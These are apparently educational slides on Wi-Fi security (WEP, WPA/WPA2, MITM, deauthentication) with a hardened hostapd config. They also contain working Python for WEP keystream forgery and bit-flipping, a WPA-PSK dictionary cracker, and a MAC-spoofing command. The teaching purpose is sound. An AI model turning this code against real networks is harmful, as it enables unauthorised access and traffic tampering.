Wireless Network Security
802.11 Standards

 802.11a – 54 Mbps @ 5 GHz
    Not interoperable with 802.11b (different band)
    Limited distance
    Dual-mode APs require 2 radios/chipsets and look like two APs to
     clients
    Cisco products: Aironet 1200
 802.11b – 11 Mbps @ 2.4 GHz
    Full speed up to 300 feet
    Coverage up to 1750 feet
    Cisco products: Aironet 340, 350, 1100, 1200
 802.11g – 54 Mbps @ 2.4 GHz
    Same range as 802.11b
    Backward-compatible with 802.11b
    Throughput drops in mixed b/g mode (protection overhead for
     the 802.11b clients)
    Cisco products: Aironet 1100, 1200

802.11 Standards (Cont.)

   802.11e – QoS
      Certified as “Wi-Fi Multimedia (WMM)” by the Wi-Fi Alliance
   802.11i – Security
      Adds AES-CCMP encryption (the basis of WPA2)
      AES needs hardware support; WEP-era chips cannot do it
      TKIP (WPA) was the interim solution for that older hardware
   802.11n – (2009)
      up to 300 Mbps with two spatial streams (600 Mbps maximum)
      5 GHz and/or 2.4 GHz
      ~230 ft range
   802.11ac – (under development at the time; ratified December 2013)
      High throughput in the 5 GHz band
      Wider RF channels (80 MHz, optionally 160 MHz)
      Multi-station WLAN throughput of at least 1 Gbps
      Maximum single-link throughput of at least 500 Mbps

Wireless Network Modes

 802.11 wireless networks operate in two basic modes:
   1. Infrastructure mode
   2. Ad-hoc mode

 Infrastructure mode:
    each wireless client associates with a central device, the
       Access Point (AP)
    no direct connection between wireless clients
    the AP relays frames between wireless clients and bridges
       them to the wired network

Wireless Network Modes (cont’d)

    The AP handles:
        client authentication
        authorization
        link-level data security (access control and
          enabling data traffic encryption)
 Ad-hoc mode (IBSS):
    each wireless client connects directly to the others
    no central device managing the connections
    rapid deployment of a temporary network where no
     infrastructure exists (an advantage after a disaster)
    each node must maintain its own list of trusted peers;
     there is no central point to enforce access control

Security Threats

• Wireless technology doesn’t remove any old security
  issues, but introduces new ones
   – Viruses, Trojans and other malware are still there
   – Eavesdropping
   – Man-in-the-middle attacks
   – Denial of Service
Eavesdropping (Sniffing)

• Easy to perform, almost impossible to detect: a card in
  monitor mode receives everything and transmits nothing
• On an open (unencrypted) network everything is transmitted
  in clear text
   – Usernames, passwords, content ...
   – No security offered by the transmission
     medium; the radio link does not stop at the wall
• Different tools available on the internet
   – Network sniffers, protocol analysers . . .
• With the right equipment (a directional antenna), it’s possible
  to eavesdrop traffic from a few kilometers away
Wireless Man in the Middle (MITM) Attack
 In a MITM attack, the attacker funnels the victim’s traffic through a
point controlled by the attacker, which allows data analysis and
manipulation. It works because 802.11 management frames carry no
authentication unless 802.11w (Protected Management Frames) is in use.
1.   Attacker sends a forged disassociation (or deauthentication)
     frame, spoofing the victim’s or the AP’s address
2.   The victim starts to look for a new access point, and the
     attacker advertises his own AP on a different channel, using
     the real AP’s MAC address and SSID
3.   The attacker connects to the real AP using the victim’s MAC
     address and relays the traffic in both directions
Denial of Service

• Frequency jamming
  – Not very technical, but works; no protocol-level fix
• Spoofed deauthentication / disassociation
  messages
  – can target one specific user
  – management frames are unauthenticated in the base standard;
    802.11w (Protected Management Frames) stops this attack

• Attacks at higher layers
  – SYN Flooding
  – Ping of death
  – ...
SSID – Service Set Identifier
 Identifies a particular wireless network
 A client must set the same SSID as the one configured on the
  AP to join the network
 Without the SSID, the client won’t be able to select and join
  a wireless network
 Hiding the SSID is not a security measure, because the
  wireless network is not invisible
 Beacons are still transmitted with the SSID field blanked (so the
  BSSID and channel are visible), and the SSID itself is sent in the
  clear in every probe request, probe response and association
  request; sniffing one client joining (or forcing one to reconnect)
  reveals it
 Simply use a utility to show all the current networks:
    inSSIDer
    NetStumbler
    Kismet
IEEE 802.11 Security – Access control list

    Access control list (MAC filtering)
       Simplest security measure
       Filters out unknown clients
       Requires a list of authorized clients’ MAC addresses to
        be loaded in the AP
       Protects neither the wireless client nor the confidentiality
        and integrity of traffic; MAC addresses travel in the clear
        in every frame header, even on an encrypted network
       Defeated by MAC spoofing (sniff an allowed address, then
        clone it):
          ifconfig eth0 hw ether 00:01:02:03:04:05 (Linux)
          SMAC - KLC Consulting (Windows)
          MAC Makeup - H&C Works (Windows)

WEP - Wired Equivalent Privacy

 The original native security mechanism for 802.11 WLANs (1997)

 Meant to protect wireless communication from
  eavesdropping (confidentiality)

 Prevent unauthorized access to a wireless network (access
  control)

 Prevent tampering with transmitted messages (integrity)

 Provide users with a level of privacy equivalent to that of a
  wired network; the name reflects that goal, which WEP fails to meet

WEP
1. Appends a 32-bit CRC checksum (the ICV) to each outgoing frame
   (INTEGRITY). CRC-32 is a linear error-detecting code, not a
   cryptographic MAC, so it cannot stop deliberate modification.

2. Encrypts the frame body plus ICV with the RC4 stream cipher, using a
   40-bit (standard) or 104-bit (enhanced) shared key prefixed with a
   24-bit initialization vector (IV) (CONFIDENTIALITY). The marketing
   names “64-bit” and “128-bit” count the IV.

3. The IV and the shared default key configured on both the station
   and the access point are concatenated into the per-frame RC4 key,
   which produces a key stream. The key stream is XORed with the
   plaintext (message + ICV) to produce the WEP encrypted frame; the IV
   is sent in the clear in front of it.

   Initialization Vector IV
      Dynamic 24-bit value
      Chosen by the transmitting interface (randomly or from a counter,
        depending on the driver)
      Only 2^24 ≈ 16.7 million possible IVs, hence only that many
        distinct keystreams per shared key
How WEP works

(diagram of the WEP encryption process described above)

RC4 keystream XORed with plaintext

(diagram)

 XOR operation
    denoted as ⊕
    plain-text ⊕ keystream = cipher-text
    cipher-text ⊕ keystream = plain-text
    plain-text ⊕ cipher-text = keystream (so any known plaintext
      reveals the keystream for that IV)
WEP Authentication (shared-key)
1. The station sends an authentication request to the AP
2. The AP sends a 128-byte challenge text (a nonce) to the station.
3. The station WEP-encrypts the challenge with its configured 64-bit
   or 128-bit default key (40- or 104-bit key plus a fresh IV) and
   sends the result to the AP.
4. The AP decrypts the encrypted challenge with its own copy of the
   WEP key that corresponds to the station's default key index.
5. The AP compares the decrypted challenge with the original.
6. If they match, the AP and the station share the same WEP key,
   and the AP authenticates the station.
7. The station then associates with the network.
WEP authentication problems

Known-plaintext attack
• Attacker sniffs the challenge m sent by the AP
• Attacker sniffs the response sent by the station:
  – IV in the clear
  – Encrypted challenge c
• Attacker calculates the keystream ks = m ⊕ c (strictly
  (m || CRC-32(m)) ⊕ c, since the ICV is encrypted too), which is
  the keystream for that IV under the network key.
• Attacker then requests authentication and
  receives a new challenge m’
• Attacker sends the response c’ = ks ⊕ (m’ || CRC-32(m’)) together
  with the same IV
• The AP decrypts, matches m’ and declares the attacker
  authenticated, although the attacker never learned the key!
• Shared-key authentication is therefore weaker than open
  authentication: it hands out a 132-byte keystream for free.
WEP flaws and vulnerabilities
 IV reuse and small size:
    There are only 2^24 different IVs, and the IV is the only
     part of the RC4 key that changes from frame to frame
    On a busy network the IV space is exhausted within hours, so
     IVs are reused while the default key stays the same; two
     frames under the same IV share a keystream, and XORing them
     cancels it (c1 ⊕ c2 = p1 ⊕ p2), so the original messages
     can be retrieved relatively easily.
    With IV reuse, it is possible to determine keystreams
     and hence enable an attacker to forge packets, obtaining
     access to the WLAN.
 Weak integrity: the CRC-32 ICV is linear, so an attacker can
  flip bits in an encrypted frame and fix up the ICV without the key
 Weak keys: RC4 with a known 3-byte IV prefix leaks key bytes
  (the FMS attack, 2001), which is what the key-recovery tools exploit

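The following Python walks through the encryption on slides 13 to 15 and the attacks on slides 17 and 18 in working code. It is an added example, not code from the original slides; the key, IV, challenge and message bytes are constructed test values, and the bit-flip step at the end relies on the linearity of CRC-32, which the slides only hint at under “forge packets”.

```python
"""WEP worked example: RC4 + CRC-32 framing and the attacks from the
slides. Added here; not code from the original slides. Key, IV,
challenge and message bytes are constructed test values."""
import os
import zlib
from typing import Optional


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian on the wire."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_keystream(iv: bytes, key: bytes, length: int) -> bytes:
    """Per-frame RC4 key is IV (3 bytes) || shared key (5 or 13 bytes)."""
    assert len(iv) == 3 and len(key) in (5, 13)
    return rc4(iv + key, length)


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Frame = IV || (RC4(IV||key) XOR (plaintext || ICV(plaintext)))."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, wep_keystream(iv, key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Return the plaintext, or None if the ICV check fails."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, wep_keystream(iv, key, len(ct)))
    pt, tag = body[:-4], body[-4:]
    return pt if icv(pt) == tag else None


# Slide 17: shared-key authentication leaks a keystream to a sniffer.
def recover_keystream(challenge: bytes, response: bytes) -> tuple:
    """ks = (m || ICV(m)) XOR c; valid for the IV carried in the response."""
    return response[:3], xor(challenge + icv(challenge), response[3:])


def forge_frame(iv: bytes, ks: bytes, plaintext: bytes) -> bytes:
    """Encrypt any plaintext up to len(ks)-4 bytes under the reused IV
    without knowing the key. Serves both to answer a fresh auth
    challenge (slide 17) and to inject data frames (slide 18)."""
    body = plaintext + icv(plaintext)
    assert len(body) <= len(ks)
    return iv + xor(body, ks[:len(body)])


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Modify an intercepted frame without the key. CRC-32 is affine over
    GF(2): ICV(p ^ d) == ICV(p) ^ ICV(d) ^ ICV(zeros), so the encrypted
    ICV can be patched to match the patched payload."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    assert len(delta) <= n
    d = delta.ljust(n, b"\x00")
    return iv + xor(ct, d + xor(icv(d), icv(bytes(n))))


def ap_accepts(key: bytes, challenge: bytes, response: bytes) -> bool:
    """The AP's check in shared-key authentication (slide 16, steps 4-6)."""
    return wep_decrypt(key, response) == challenge


def demo() -> dict:
    key = b"\x01\x02\x03\x04\x05"             # 40-bit key (constructed)
    iv = b"\xaa\xbb\xcc"
    m = os.urandom(128)                        # AP's challenge text
    c = wep_encrypt(iv, key, m)                # legitimate station's reply
    iv_seen, ks = recover_keystream(m, c)      # attacker only saw m and c
    m2 = os.urandom(128)                       # challenge sent to attacker
    auth_ok = ap_accepts(key, m2, forge_frame(iv_seen, ks, m2))
    injected = wep_decrypt(key, forge_frame(iv_seen, ks, b"GET / HTTP/1.0"))
    victim = wep_encrypt(b"\x10\x20\x30", key, b"transfer $0010")
    tampered = flip_bits(victim, xor(b"transfer $0010", b"transfer $9910"))
    return {"keystream_ok": ks == wep_keystream(iv, key, 132),
            "auth_ok": auth_ok, "injected": injected,
            "tampered": wep_decrypt(key, tampered)}


if __name__ == "__main__":
    print(demo())
```

`demo()` shows the whole chain: one sniffed shared-key exchange yields a 132-byte keystream for that IV, which is enough to pass authentication and to inject a frame, and `flip_bits` changes a frame the attacker did not craft while the AP still sees a valid ICV. Note that no part of the attack ever needs the WEP key itself.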
Attacks on WEP

WEP-encrypted networks can be cracked in about 10 minutes

Goal is to collect enough IVs (encrypted frames) to recover the key
statistically; the PTW attack (2007) used by aircrack-ng needs roughly
40,000–85,000 captured frames for a 104-bit key

IV = Initialization Vector, a 24-bit value prepended to the key and
sent in the clear with every frame, meant to avoid keystream repetition

Injecting packets (e.g. replaying a captured ARP request, which the AP
re-encrypts with a fresh IV every time) generates IVs far faster than
passive sniffing

Attacks on WEP

 BackTrack 5 R2 (released 1 March 2012; succeeded by Kali Linux)

 Tutorials are available (the aircrack-ng suite: airmon-ng,
  airodump-ng, aireplay-ng, aircrack-ng)

 All required tools on a Linux
  bootable live CD/USB + laptop +
  wireless card that supports monitor mode and packet injection

WEP cracking example

(screenshot)

WPA – (Wi-Fi Protected Access)
   Introduced by the Wi-Fi Alliance in 2003 (announced late 2002) as a
    firmware-upgradable fix for the security flaws of WEP.

   Improved data encryption – Data is still encrypted with the RC4
    stream cipher, but with a 128-bit per-packet key produced by TKIP
    and a 48-bit initialization vector (IV) that doubles as a sequence
    counter. 2^48 ≈ 2.8 × 10^14 is a large number: more than 280 trillion.

   Because of the many attacks on the static key in WEP, WPA
    uses the Temporal Key Integrity Protocol (TKIP), which mixes a
    fresh key into every packet and rekeys as the system is used. This,
    combined with the much larger IV (which also blocks replay),
    defeats the well-known key recovery attacks on WEP.

   A message authentication code (usually known as a MAC, but here
    termed MIC for "Message Integrity Code") is added, an algorithm
    named "Michael". Michael is only 64 bits and was designed to run on
    WEP-era hardware; it is weak enough that TKIP needs countermeasures
    (rekey and a 60-second blackout after two MIC failures in a minute),
    and TKIP as a whole is now deprecated.
WPA2 - Wi-Fi Protected Access 2

 Based on the IEEE 802.11i standard (2004)
 2 versions: Personal & Enterprise
 The primary enhancement over WPA is the use of the
  AES (Advanced Encryption Standard) algorithm in CCMP mode
  (counter-mode encryption with a CBC-MAC integrity check)
 WPA2 mandates AES-CCMP; TKIP may be allowed alongside it only
  for backward compatibility with WPA clients, and a mixed network
  is only as strong as TKIP
 The Personal mode uses a PSK (Pre-shared key) derived from a
  passphrase & does not require separate authentication of users
 The Enterprise mode requires users to be separately
  authenticated with 802.1X/EAP against an authentication server
  (typically RADIUS), which gives each session its own key

Am I secure if I use WPA-PSK?

 WPA-PSK protected networks are vulnerable to offline dictionary
  attacks: the PSK is derived from the passphrase and the SSID
  (PBKDF2-HMAC-SHA1, 4096 iterations), and one captured 4-way
  handshake is enough to test candidate passphrases without ever
  touching the AP again
 Works with WPA & WPA2 (802.11i); the handshake is the same
 New attack techniques have increased the speed of this attack
  – coWPAtty (
  http://wirelessdefence.org/Contents/coWPAttyMain.htm )
    Run coWPAtty against the captured packets to crack the key
    Needs the SSID to crack the WPA-PSK (it is the salt), easily
     obtainable!
    Also supports WPA2-PSK cracking with the same pre-computed
     (per-SSID) tables!
 To obtain the handshake: spoof the MAC address of the AP and tell
  the client to deauthenticate/disassociate, then
 Sniff the wireless network for the WPA-PSK handshake (EAPOL) as
  the client reconnects
 Security therefore rests entirely on passphrase entropy; Enterprise
  mode avoids the problem, since there is no shared secret to guess

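To make the dictionary attack concrete, the following Python reimplements the parts of 802.11i that matter here (PBKDF2 PSK derivation, PRF-512 PTK expansion and the EAPOL-Key MIC) and runs a small wordlist against a constructed handshake. It is an added example, not the slides’ or coWPAtty’s code; the SSID, MAC addresses, nonces, wordlist and the simplified EAPOL frame bytes are placeholders. It also runs the same capture against the wrong SSID, to show why the pre-computed tables are per-SSID.

```python
"""WPA/WPA2-PSK offline dictionary attack, as an added example (not code
from the slides or from coWPAtty). Derives the PMK the way 802.11i does
(PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations), expands it to the
PTK and checks the MIC of a captured 4-way-handshake message. The
handshake below is constructed, not captured; MACs, nonces and the
EAPOL frame bytes are placeholders."""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK = PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes).
    The SSID is the salt, which is why coWPAtty tables are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(...)).
    Everything except the PMK is visible in the captured handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-SHA1
    for WPA2/CCMP (descriptor v2), HMAC-MD5 for WPA/TKIP (v1); 16 bytes."""
    h = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_mic_zeroed, h).digest()[:16]


def crack_psk(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
              eapol_mic_zeroed: bytes, mic: bytes, wordlist: Iterable[str],
              wpa2: bool = True) -> Optional[str]:
    """Offline attack: each candidate costs 4096 HMAC-SHA1 rounds and
    never touches the AP. The KCK is the first 16 bytes of the PTK."""
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed, wpa2), mic):
            return candidate
    return None


def demo() -> dict:
    ssid = "CorpWLAN"                                   # constructed
    real_passphrase = "sunshine1"                       # weak, in the list
    aa = bytes.fromhex("001122334455")                  # AP BSSID (constructed)
    spa = bytes.fromhex("66778899aabb")                 # station MAC (constructed)
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    # Simplified EAPOL-Key message 2 with the 16-byte MIC field zeroed
    # (placeholder layout, enough to show what the MIC covers).
    eapol_zeroed = bytes.fromhex("0103005f02010a00") + b"\x00" * 8 + snonce + b"\x00" * 32
    # What the sniffer sees: the MIC the real station produced.
    kck = derive_ptk(pmk_from_passphrase(real_passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol_zeroed)
    wordlist = ["password", "letmein", "sunshine1", "CorpWLAN2012"]
    return {
        "found": crack_psk(ssid, aa, spa, anonce, snonce, eapol_zeroed, mic, wordlist),
        # Same capture, wrong SSID: every candidate derives a different PMK.
        "wrong_ssid": crack_psk("Guest", aa, spa, anonce, snonce, eapol_zeroed, mic, wordlist),
        "pmk_hex": pmk_from_passphrase(real_passphrase, ssid).hex(),
    }


if __name__ == "__main__":
    print(demo())
```

The cost of the attack is the 4096 PBKDF2 iterations per candidate, not any interaction with the network, which is why GPU crackers and per-SSID rainbow tables help and why a passphrase from any wordlist falls. The `wrong_ssid` result is `None` for the same capture, which is the whole reason the tables have to be rebuilt for every SSID.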
WPA Cracking Example

(screenshot)

Wireless Network tools

 MAC Spoofing
    http://aspoof.sourceforge.net/
    http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp
    http://www.klcconsulting.net/smac/
 WEP Cracking tools
    http://www.backtrack-linux.org/
    http://www.remote-exploit.org/articles/backtrack/index.html
    http://wepattack.sourceforge.net/
    http://wepcrack.sourceforge.net/
 Wireless Analysers
    http://www.kismetwireless.net/
    http://www.netstumbler.com/

Techniques to improve wireless security
   Use a wireless intrusion prevention system (WIPS) to spot rogue
    APs and deauthentication floods

   Enable WPA2-PSK at a minimum; never WEP, and never an open network

   Use a good passphrase (https://grc.com/password): the PSK attack is
    offline, so length and randomness are the only defence

   Use WPA2-Enterprise (802.1X/EAP) where possible, so that no shared
    secret exists to be guessed

   Use AES-CCMP only; TKIP is deprecated and gives no performance
    benefit on hardware with AES support

   Use a unique, non-default SSID: the SSID salts the PSK derivation,
    so it defeats pre-computed tables (hiding it, by contrast, adds nothing)

   Enable 802.11w Protected Management Frames where clients support
    it, to stop spoofed deauthentication

   Wireless network users should use or upgrade their
    network to the latest released security standard
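The recommendations above expressed as a hostapd configuration, with the weak settings that the original slide’s “use TKIP for performance” advice would produce left commented beside the hardened ones. This is an added example, not from the slides; the interface name, SSID and passphrase are placeholders to be replaced.

```ini
# hostapd.conf fragment: added example, not from the original slides.
# Interface, SSID and passphrase are placeholders.
interface=wlan0
driver=nl80211
ssid=CorpWLAN
hw_mode=g
channel=6

# --- weak: WPA1 with TKIP and a hidden SSID ---
# wpa=1
# wpa_key_mgmt=WPA-PSK
# wpa_pairwise=TKIP
# ignore_broadcast_ssid=1

# --- hardened ---
# WPA2 (RSN) only: bit 1 = WPA, bit 2 = WPA2, so 2 disables WPA1
wpa=2
wpa_key_mgmt=WPA-PSK
# AES-CCMP only; no TKIP fallback, so no mixed-mode downgrade
rsn_pairwise=CCMP
# 8 to 63 printable characters; use a long random one, this is the
# only thing standing between a captured handshake and the key
wpa_passphrase=CHANGE-ME-to-a-long-random-phrase
# 802.11w Protected Management Frames: 2 = required
ieee80211w=2
# Hiding the SSID adds nothing; keep it broadcast
ignore_broadcast_ssid=0
```

hostapd treats a `#` only at the start of a line as a comment, so the explanations sit on their own lines rather than after the values. Clients that cannot do CCMP or 802.11w will fail to associate, which is the intended outcome: it surfaces legacy devices instead of silently lowering the whole network to their level.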
